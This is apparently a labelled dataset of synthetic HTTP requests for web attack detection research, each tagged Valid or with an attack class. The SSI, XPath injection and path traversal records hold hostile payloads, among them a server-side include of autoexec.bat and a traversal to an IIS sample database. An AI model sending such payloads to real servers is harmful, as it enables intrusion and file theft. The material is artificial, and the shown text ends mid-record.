X-Serial-Number: 2123375255700978205
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24263
Start - Id: 40375
class: SSI
GET /5NG/aY@@@fn/zds2kZaWP/QdgHZ/nLst.bin?xs=et9&uMxV6b=aoS4gXRj8i&in=b&tcdjdirbtn=otperjde3n&iti=4094111&dueqfnr=09597&4ilneyohnl0Sdn=body&ies=no&meatdvt=aaC%3BT HTTP/1.0
Host: www.snemndsf.de:58
Connection: hwhtmTg
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nQegrSDa-n6thgu
Cache-Control: max-age=2418
Client-ip: 58.120.67.244
Cookie: rrzhthnurteoed9=eratEsGctThswWnhz9;nia6idoytnsc=192840;eiG=7667381;bktaasue=<!--   #include    virtual="d:\windows\autoexec.bat"   -->;rutm42iEbtAaieC=t]&;sccel7elztu3h=hk
Cookie2: $Version="67"
Date: Mon, 27 Mar 06 18:34:50 UTC
ETag: "Ab7E..CzWy.vX7-Q"
Expect: 100-continue
From: 1eoztmn@rnefEadA.biz
If-Modified-Since: Thu, 05 Aug 04 19:57:07 GMT
If-Unmodified-Since: Thu, 19 Oct 06 15:15:42 CET
If-Match: *
If-None-Match: "GN8imcM7n6ubZybgFbT"
If-Range: Mon, 23 Jan 06 05:50:18 UTC
Max-Forwards: 1
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: lfrwel uh88eint=ehuoov
Authorization: tidal 2rne8esa=f3qr
Range: 30396-
Referer: http://www.ao4dlm.be/aeit/elny/caxOt.tiff
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 2.5; 2c-7y; rv:6.3.1) Gecko/63515126
UA-OS: Windows NT
UA-Pixels: 3403x8104
Via: dNm/7.2 www.TvEE.gif:7171
Transfer-Encoding: compress
Upgrade: euTos/6.4, o1iks/6.6, neats/8.3, ryoF/1.7
Warning: 835 www.yRtlia.png "E4ihupeEntai" "Fri, 09 May 08 20:51:23 GMT"
X-Forwarded-For: 163.52.53.58
X-Serial-Number: 49397993835
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40375
Start - Id: 31389
class: Valid
GET /gynepeiox00aao/et2enyubt7o/emaiHeoIn6fI/8scuqlsT2niets/ixZth4h/6J8Fy/2htthh3Dxcouse/epiyoss/rmzxp_Z@0VTo4oTn.asp? HTTP/1.1
Host: 95.51.175.148
Connection: smsPbr
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: identity
Accept-Language: *;q=0.9
Cache-Control: max-age=1
Client-ip: 248.191.216.133
Cookie: eyo4ynortrfOrp=t
Cookie2: $Version="970"
Date: Tue, 24 Jan 06 16:33:14 GMT
ETag: W/"ogu5MqMSWXfdu5Wk"
Expect: 100-continue
From: Tzeuatea@eoges.de
If-Modified-Since: Tue, 17 Oct 06 17:43:52 UTC
If-Unmodified-Since: Wed, 12 Sep 07 08:23:37 UTC
If-Match: "Mow4e_MnJVbf9iRWHpJv"
If-None-Match: "ROqSUmhke6LfzrWCfW"
If-Range: *
Max-Forwards: 4417
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: Basic ZWdoZWNBaDphaW5ucmplOQ==
Range: 214-,6423-,-75701
Referer: /rchdp/nydu/rReoy/iia4k.txt
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.4 (compatible; MSIE 5.0; Open BSD i586; eua7)
UA-CPU: StrongARM
UA-Disp: 6015,3763,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: 5.7 242.113.197.193, 0fzt/7.6 174.187.184.79
Transfer-Encoding: beib; ruis=czhrLit
Upgrade: ruexiD/5.5
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 662905133581730649
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31389
Start - Id: 22361
class: Valid
GET /cv/oFtthe35R/s1xlidSkc/mLKwwgetsock_streamDhODS/tO7ROrWYctp@2WE/eIfvg./aWz/6t4utp/oRp4g0ddOwE8-xjGcaEy/rin1tVe.js?.rJ2HeTcMlog=lmHaojeF&uLpihideEesyoko=rae%5D0&jlitin=19375707&varKIly5RAr.=wf%3Ct+&om2nenbe=W%2Byxterm&ieeiOteec5ec6i=tjsc+Ceeit%26jt&oD9dcueaEi=%5Beinclude6os6-iaruP&4tsbhxLhut=rpbl%3B++%26d%2Fometaeb%40rwgetn&imlleeo9lCmrte=171075593&iLniyaiho6y6tq5=99586296&0lrsi=83&aie=+erukogsneyN&staorn=55 HTTP/1.0
Host: www.stllyee.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: cOia7isi-cl;q=0.1, Ir-lT;q=0.5, pfniw-a, ixharnl-ivn7ews;q=0.1, hs-haawsM;q=0.4
Cache-Control: only-if-cached
Client-ip: 103.55.87.90
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="7"
Date: Tue, 29 Dec 09 03:14:34 GMT
ETag: W/"eZqjmmpUTrk9Hg2"
Expect: 100-continue
From: ehfibls1@lhrs6.org
If-Modified-Since: Sun, 30 Aug 09 07:50:30 CET
If-Unmodified-Since: Tue, 20 Nov 07 22:47:50 UTC
If-Match: *
If-None-Match: "DAqJnqA.8kQFJuhAjx9"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.8
Pragma: laroy='eyDzroey'
Proxy-Authorization: Basic U2FkeG46YWJkZm8=
Authorization: NTLM TWRvTG51ZXloYWtpdnhyZWNzc3JkZXRpYWE3aGkyaW5pcjFh
Range: 308-
Referer: http://www.uyLqopnu.st/rtsewi/wlewote/c2dLAnen/uoiee.mpg
TE: deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 6.1; od-ge; rv:4.4.5) Gecko/91369793
UA-CPU: 68000
UA-Disp: 369,681,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 112x1566
Via: 27nsu/3.3 www.abjit.shtml, FTP/2.1 www.rdhviAa.css:954, FTP/2.0 176.186.8.133
Transfer-Encoding: gzip
Upgrade: aos/2.3, onrpu/3.4
Warning: 860 www.cneasowg.jpg:0858 "rgda4" 
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22361
Start - Id: 7283
class: Valid
POST /oraMxBEIiS.Vv.asmx? HTTP/1.1
Content-Length: 193
Content-Language: is,oeggHx,neIee
Content-Encoding: gzip
Content-Location: /msxoldrt/54hrjd.exe
Content-MD5: YUdtMm55c2h0ZW1hVGNncw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Oct 09 23:23:14 UTC
Last-Modified: Fri, 07 Oct 05 09:25:28 UTC
Host: 2.55.181.31
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932, x-mac-turkish
Accept-Encoding: *
Accept-Language: siMi2reh-thnta5i;q=0.3
Cache-Control: no-transform
Client-ip: 180.159.10.206
Cookie: chgroUs1v=ke>inufas=;wowxTxRjE=~glneeszpaqee;ssttYs=426197
Cookie2: $Version="2"
Date: Fri, 16 Oct 09 24:22:45 UTC
ETag: W/"a_P_.ceqKKH6kOr8J"
Expect: 100-continue
From: aleOu@hlmCevz4na.org
If-Modified-Since: Tue, 02 Mar 10 04:04:02 CET
If-Unmodified-Since: Tue, 01 May 07 20:07:19 GMT
If-Match: *
If-None-Match: "dehlTL@E-7uMZSOV"
If-Range: "4SvR_YhE2JOozr1"
Max-Forwards: 239
MIME-Version: 8.8
Pragma: a=d2jos
Proxy-Authorization: Eirtt hmefn=eehsteiw
Authorization: NTLM dG5paXV6RWVFTnR0dnluaHRyZW9odG5vUmZodHNybmx2d2V6VWI=
Range: -4
Referer: /weIzis4o/ghaaor.css
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: onsf2thiar
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 400x2511
Via: 4.7 www.eaEve7wt.png, HTTP/4.5 203.128.29.248:8023, oe3/3.0 156.193.87.115
Transfer-Encoding: gzip
Upgrade: rdt/2.6, bbnoh/3.2, 1lceaS/9.8
Warning: 924 www.rtAils.htm:75 "ahvM8nsnku" 
X-Forwarded-For: 51.142.208.191
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

psoeeeOeetsM= hyl&lzyeRjwno8sfO=8803142&unhhz=OoqechoA&1rmlec7=zcFAyo2Hg&NZ8ICs83J4QO=8641601&Rtleh=1eeogo36ctexecptO~&E62WHX8WEE7z=lUrutscnrsdlNr0ea&LnyhSP3N0=edGxmoqe2rb&t3tinerP2o3ne=n1a 0

End - Id: 7283
Start - Id: 29049
class: Valid
GET /rodsesslD7albj/wPh/bE/pWyLOS/spQ2AnJ.png? HTTP/1.0
Host: 158.29.10.108
Connection: close
Accept: */*
Accept-Charset: macintosh, windows-874, iso-2022-kr;q=0.3, x-mac-greek, x-mac-turkish
Accept-Encoding: 
Accept-Language: a5-rt7te, zo-iez;q=0.8
Cache-Control: only-if-cached
Client-ip: 12.54.89.63
Cookie: tMce8=53877;srIe=448261365
Cookie2: $Version="78"
Date: Tue, 02 May 06 13:28:20 GMT
ETag: W/"7UNhncP8MDWZOP8y"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Thu, 23 Jul 09 05:45:01 UTC
If-Match: "LDo3.dH@igSULtQgM"
If-None-Match: "DJe4JV9J_y@A@-zqEIJ"
If-Range: Wed, 13 Apr 05 23:47:59 GMT
Max-Forwards: 2069
MIME-Version: 5.4
Pragma: eeAorttn=eo3eienc
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic dllkbjppN3l0cg==
Range: 2-728395,2-644,-332
Referer: /snnLRhea/eIbos/srwomrud.gif
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (compatible; Konqueror/2.3; Windows NT; Jinha; mmtsal3oIo; 7xrer7kag)
UA-CPU: x86
UA-Disp: 3428,2745,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 890x9958
Via: FTP/2.0 145.186.112.16:2
Transfer-Encoding: nhol; yGol=lvoeilpe
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 500 www.e1wd.tiff:62707 "ehn2eNmwox" "Thu, 01 Sep 05 14:12:46 CET"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29049
Start - Id: 665
class: Valid
GET /rdz-C6e.73RBD4Ma/Sd0aap11zwp-/WibIzUPrIhtaccesbgsoundIj/toheaa/be7frayRgxarthenf/sECkNLp/saaeg/EwinntnN/daMBbH/Tejnhsttl/5tidTj1t.htm? HTTP/1.1
Host: www.kuneldnieL.gov
Connection: t5erlje
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.8
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 6.84.85.244
Cookie: LM2DmHr1.=286861;mc=6325246821;-cexecCX=881;tx3yidssmhye=92266;prEmldx=30707;iai3=5299
Cookie2: $Version="421"
Date: Tue, 14 Jul 09 23:00:01 CET
ETag: W/"-mI3.VO@0Cy10pA8_D8R"
Expect: 100-continue
From: i4suSHw@tttnzs.org
If-Modified-Since: Tue, 11 Jan 05 23:23:57 UTC
If-Unmodified-Since: Fri, 14 Sep 07 08:34:10 GMT
If-Match: "LDEcsAwKT5TN6Ol6HYB"
If-None-Match: "4cs16MsCOVrRK.hs"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0eSci"
Authorization: t3n7s 4wR8t=l1Is
Range: -7,9185-99305,64-211014
Referer: /tner.wmn
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.8 (compatible; Konqueror/5.8; SunOS sun4u; srtsye; efyTtid; nNi11aDyo)
UA-CPU: 68000
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 947x181
Via: 9.2 www.rNn2nhfs.gif, FTP/1.8 100.54.15.173
Transfer-Encoding: Inedt1; hare=attgeht
Upgrade: servnt/2.1, oxLrlm/3.0, hnae/0.5, aicd/0.5, uhtthe/3.4
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 541499677250739
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 665
Start - Id: 49692
class: XPathInjection
GET /7awaza6a5tohihobet/IobjectUuAM/5lrarnxregeRzw8R/lnag/7eh/sw3k/oBe_TK/eaianrgogEntn/dsnot6e1/pv1mhelae/ecopyboot.inipSGDB8/rcd4.jsp?tstb4de=tRoluj&odrgl5rebhw=rbt&02=rnG+%5Ddkv%25aezed&oq6at0rDaibhr=neLio5j%27+++or+count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++i++++%2B+++j+%2B++k++++%2B++++l++++%2B++++1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++++%27t2omdNpr%27%3D++++%27+++8ei8se%27++or&.sAGeHMz=odilebeC0uuFtrc HTTP/1.0
Host: www.o7h7eEn4im.be
Connection: close
Accept: video/mpeg, audio/*;q=0.9, application/postscript
Accept-Charset: cp-936, gb2312;q=0.6, windows-1258, windows-1255
Accept-Encoding: *
Accept-Language: pgiE0qj-r4rciT, eteLntHl-px, cue7de-Vro;q=0.2, iirsf2l-ma0sE, eccAfiu-oretNkTt;q=0.8
Cache-Control: max-age=59
Client-ip: 108.128.7.126
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="5"
Date: Thu, 01 Apr 10 15:07:21 GMT
ETag: W/"rxcndMh1TvLBsYH"
Expect: Aahhoh
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Wed, 13 Feb 08 08:13:42 GMT
If-Match: *
If-None-Match: *
If-Range: "nuu7cjCe855KxP@P.N"
Max-Forwards: 08
MIME-Version: 7.7
Pragma: k1ehsu1=d
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: NTLM ZHpwRXJyZGF3cmFFbmh0bnRhU2xlbHNUdHQ4ZWVhZXVy
Range: -394122
Referer: http://www.deieia.it/aottpe/geHw0.cgi
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/3.5 (X11; U; Linux i586 8.3; hT-aP; rv:6.6.3) Gecko/66800307
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 7.7 236.75.226.4:174
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49692
Start - Id: 45919
class: PathTransversal
GET /ffn6aBGH5r/lZZHnV2JNTo1nbfVVK/Tecbeg/e.7a_2jihzLnYn6Z/sH1C05/vvG_yOUJCGtmp0Y4.shtml?ttenicimdx=dnetmaeurite&eawRh=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ferll%2Fri%2Fleni%2Fnsoranreas.mdb HTTP/1.0
Host: 66.102.172.159
Connection: cuihwf
Accept: image/*;q=0.5, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=7601
Client-ip: 90.133.156.2
Cookie: 6N-7=sapx2tto;asc=le0tylmthu;NIot5sEpoeoe=69274765;iqan=th2dk
Cookie2: $Version="3"
Date: Fri, 15 Oct 04 02:14:05 CET
ETag: W/"mLsp4l@CbIwwgt7c-"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Sun, 01 Mar 09 12:03:52 UTC
If-Unmodified-Since: Tue, 12 Feb 08 07:29:37 GMT
If-Match: *
If-None-Match: "7eDkmWR0e_oJS55"
If-Range: *
Max-Forwards: 584
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Basic TnVlVHM6c2Fwbg==
Range: -106180,0973-,3598-
Referer: http://5e8i9.org/qt7rlwio.exe
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/4.1 (compatible; Konqueror/0.2; Linux i386; 7ham; fii1ooASap)
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4595x1071
Via: 8.1 57.233.59.130, FTP/0.7 www.k4ule.htm:93, 0.6 37.12.244.229
Transfer-Encoding: raooos; wdaciw=hnTEeTet
Upgrade: dhvol/0.8, Pde/4.9
Warning: 050 www.ecuV.tiff:35147 "8mslZ" "Thu, 18 Sep 08 24:48:34 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45919
Start - Id: 12161
class: Valid
GET /tqx5FQ.swf?votpu4mi=+s6 HTTP/1.1
Host: www.peo1srfsi.de:36076
Connection: keep-alive
Accept: audio/x-wav;q=0.5, video/quicktime;q=0.0
Accept-Charset: windows-1255;q=0.9, x-mac-chinesesimp;q=0.8
Accept-Encoding: *
Accept-Language: sceRn-luaYpa;q=0.4, insES-a, sdie-imm
Cache-Control: 8a='lsad'
Client-ip: 21.246.158.137
Cookie: paeelyt=eu$8c1ritmpo0dit;ntaiNlt=3242354
Cookie2: $Version="8"
Date: Sat, 24 Jan 09 12:03:38 CET
ETag: "F1UNx3ec86UdWlLx"
Expect: 100-continue
From: 3llueiuh@dwE6ieEe.uk
If-Modified-Since: Fri, 26 Feb 10 10:01:30 CET
If-Unmodified-Since: Thu, 27 Nov 08 06:46:02 CET
If-Match: "xneSH0.0pE-fIKq5H6cG"
If-None-Match: "M_1JEIYUcYA3w-8"
If-Range: *
Max-Forwards: 197
MIME-Version: 1.4
Pragma: hhniAti=qoseS
Proxy-Authorization: lert mmeei=fdhn
Authorization: Basic ZTJ0MG41ZDo2b3N1
Range: 807559-8320
Referer: http://1EnnAte.be/rg8sewe/a2Ca.php4
TE: gzip;q=0.5,trailers
Trailer: Host
User-Agent: tUbea (a1W-eVMgH; nu2YG.)
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
Via: HTTP/6.1 205.116.19.63, iayno/5.1 201.108.142.32:238
Transfer-Encoding: identity
Upgrade: necoeD/4.9
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 12161
Start - Id: 30373
class: Valid
GET /eUg0y0eskry09Ecacpd/wklqNWQzN.exe?smIneurf=24858849&er=415&dN1Iwp-1yf=Lmrdk7tbntelnetwru9&@y80Q=btbcTst+e9lri1%5D&pnhmbss=+cRu+iAt&Aroe8tm5efLr=ta&ngttfrhe=68501173&ecsarryng=hJucnZRManm2 HTTP/1.1
Host: www.hoxtsiuouh.com
Connection: boe0
Accept: */*
Accept-Charset: windows-1250, big5;q=0.5, iso-2022-kr, windows-1251;q=0.5, windows-1252;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 107.92.245.184
Cookie: hnba0uao=inE;E3onHOoo=%n;oGtsaztdrigliz=aueqrokueoeaur;rmO.X=rRrselecthtx@tbm;eelmwtij=a%dahtFeasai9;Aype=UpeuvitGzssne
Cookie2: $Version="36"
Date: Thu, 11 Oct 07 02:48:46 GMT
ETag: "3EIAijE5EvtBUf@9"
Expect: 0ygha
From: sfno39@ReecNnett.gov
If-Modified-Since: Mon, 17 Jul 06 09:07:59 GMT
If-Unmodified-Since: Fri, 19 May 06 22:56:17 UTC
If-Match: *
If-None-Match: "tvyquwS4Qf0PPq7PGXG"
If-Range: *
Max-Forwards: 1
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM YXVEY3RmdDBlb21lZHNvMjZsb2V0c29oTXZmdGVpdWltdGVQZWh0dG0=
Authorization: 7riel 7DlbeteZ=anehioen
Range: 506-22897,157-252319,865-1267
Referer: /bwd2d9t/aeGdr/ginInlE/oimdraw.asp
TE: trailers,chunked
Trailer: Referer
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 7.2; oe-UA; rv:0.3.7) Gecko/60600731
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9503x4246
Via: 7.5 235.111.193.17, l1hje/7.3 66.176.66.150:54, FTP/2.2 www.srteEn.tiff
Transfer-Encoding: identity
Upgrade: ehv0/7.8, SiHUl/4.9, cp2e3d/9.0
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30373
Start - Id: 35882
class: XPathInjection
GET /eZOl-LJWE9qrgCp.bin?id7eh=szC+4open%7C+f&oUItthe=ddt6Lhi%27%5D+%7C+++P+%7C++%2F%2Fuser%5B+++++name%2Ftext%28++%29++++%3D%27f3&Ehhel=5&cd=wuzheatn&e2=a3eutleHiou9eao&f6Cooalssu0N=9876&hzfwt19ra5kgHt3=3&Gfadsoda=%5Ddint+%3D+&mtdovoo4iis=41&CcQrZW.hI.=tv7X3CP9&eaof=462580692&_edocumentXsock_streamlike7oHfG=th&CvnSXY=f&rnio2g=hopbhohawen HTTP/1.1
Host: 81.69.201.8
Connection: close
Accept: */*
Accept-Charset: windows-1252;q=0.6
Accept-Encoding: 
Accept-Language: k-uoqn8, ostqMc-hl, n-8xe8tu;q=0.8
Cache-Control: Ao=3d
Client-ip: 204.135.13.34
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="462"
Date: Sun, 05 Aug 07 13:48:14 GMT
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 18 Dec 08 06:31:56 UTC
If-Unmodified-Since: Mon, 18 Jul 05 15:05:11 CET
If-Match: *
If-None-Match: "hwzsS1.sHLWWGb4Qyrv6"
If-Range: Thu, 24 Feb 05 15:05:27 CET
Max-Forwards: 153
MIME-Version: 8.2
Pragma: snekhek='neSn2'
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=iNhnincr
Range: 3-18807,30473-219,305975-44534
Referer: /meoe9v4e/teentutT/et7eal/crwas.shtml
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 6.8; Cb-nx; rv:1.7.0) Gecko/96663668
UA-CPU: x86
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: ine/4.4 www.kMjsI0.htm
Transfer-Encoding: identity
Upgrade: lcMte/6.9, el3/2.6, eorKne/2.7, ennt/1.8
Warning: 101 85.27.216.93 "eLs9meaamietHtrSra" "Sun, 03 Apr 05 18:55:14 CET"
X-Serial-Number: 160475
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35882
Start - Id: 25518
class: Valid
GET /ejs.jpg?ds0rn9hnh=49375670&sNeesnirTd=nckz&4T7=wdz%7CoH+eza+2telnetservicesO+Ktform&kCmAkkp=eyc&miyrtes=090 HTTP/1.1
Host: www.ts5s.ch
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.5, gzip, gzip, deflate
Accept-Language: n4Oynitt-tns, Qf-oEhiugnq;q=0.1, 7xtrtiT-Yko;q=0.7, n-d3bsea, 9ofao-famW;q=0.2
Cache-Control: no-transform
Client-ip: 212.243.56.61
Cookie: ahoYeg6Esersh2=12456;3%uoqaw8=eimgd
Cookie2: $Version="8"
Date: Tue, 20 Apr 10 18:23:42 GMT
ETag: W/"2HygnodO_Jen40r.tb"
Expect: auoa
From: osil@wYub.gov
If-Modified-Since: Sat, 18 Oct 08 20:07:00 CET
If-Unmodified-Since: Fri, 20 Mar 09 06:47:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 52
MIME-Version: 1.0
Pragma: enre2mtu='7h25P3dt'
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: Basic cWlxbWRlNDp3anNheWk=
Range: 667-742
Referer: http://www.Etaowge1.fr/rdsqv4ne/euenn/gn57oae.swf
TE: gzip
Trailer: Date
User-Agent: fPax (rlz_oko; oNz.qt; oKfkU3V; n1Ozh6Ej)
UA-CPU: MIPS
UA-Disp: 0020,943,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5796x493
Via: hc5so/3.3 www.eizgr.htm:6, HTTP/6.3 www.93tele.jpeg
Transfer-Encoding: deflate
Upgrade: ftdTss/7.6
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 33645142012185435
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25518
Start - Id: 8424
class: Valid
GET /aBvLCpasswd0jL.msf?Czotdnoi=43&athsembate=87&3loeldosynoorw=Eprro%29%3B%2Fta&horis=07718514&E7bt=489856858 HTTP/1.0
Host: www.oNtoS.gov
Connection: keep-alive
Accept: text/xml;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 146.158.92.239
Cookie: idnxzeoNa=oa;VevalF--whereD8q=as a9$n7n
Cookie2: $Version="3"
Date: Sat, 06 Dec 08 05:55:47 UTC
ETag: "gvXv8Xn9k-YLo2nNN"
Expect: 100-continue
From: 8r0d@bdoa.cz
If-Modified-Since: Mon, 23 Nov 09 07:17:04 CET
If-Unmodified-Since: Thu, 27 Mar 08 19:47:06 GMT
If-Match: *
If-None-Match: "1A9Wn193xi0g4Gjn"
If-Range: *
Max-Forwards: 056
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM OHJlbWVlZXR3OWUyc3RmbWgydGRyb2djcmV3dFJ3cG9vZmlhcjZ0T2VlRW50bmE=
Authorization: Digest uri=http://manmtesr.de/3surs/enhdat.cfm
Range: 859-,4209-514,8-55532
Referer: http://neopZ.st/bbgsho.nsf
TE: deflate,trailers
Trailer: If-Match
User-Agent: aTmchririmbwjssO0Vdn
UA-CPU: MIPS
UA-Disp: 9749,6112,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3083x039
Via: 3.7 151.236.67.62, ind/0.4 17.50.208.191, ses8y/8.2 137.164.110.232
Transfer-Encoding: identity
Upgrade: afenit/8.9, yetghO/1.3, dccom/3.8, omnhat/5.8, ntvui/6.9
Warning: 357 99.135.65.27 "td6odiagrnr7lillcex" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8424
Start - Id: 14235
class: Valid
GET /aHAdio6cngihornye/a28/nQPpC/oa4hpm2ebchrstr.bin?80tio7t=ao&SaoyfromyYWiX5=eiq&g5J4V8J=EitserCl%27e%2Fi1&hyshltisnpiiyn=pfyu&2rdnrdaTshue=-elib&EgnLfeye=g2rUfMpkj_&Ksghn=esofntibodyosApeftp HTTP/1.0
Host: www.snnY6h.be:80
Connection: etilgdn
Accept: video/*, text/xml, audio/basic;q=0.6
Accept-Charset: shift_jis;q=0.3, iso-8859-5, windows-874, koi8-r, iso-8859-7;q=0.6
Accept-Encoding: compress, identity;q=0.6
Accept-Language: Y7aLbut-ifsrre38, h-s;q=0.4, om-gE0nEn64
Cache-Control: no-store
Client-ip: 217.57.174.13
Cookie: btpgmtT=?s-oe[jrcpyc\h;Casock_streamXO0tmp9=jDnIcnOd
Cookie2: $Version="64"
Date: Thu, 15 Jan 09 04:41:32 CET
ETag: W/"AeZN8RZMmoUH4hCBsnaF"
Expect: 100-continue
From: ytnpe@aitntig.fr
If-Modified-Since: Sun, 11 Apr 10 02:50:49 UTC
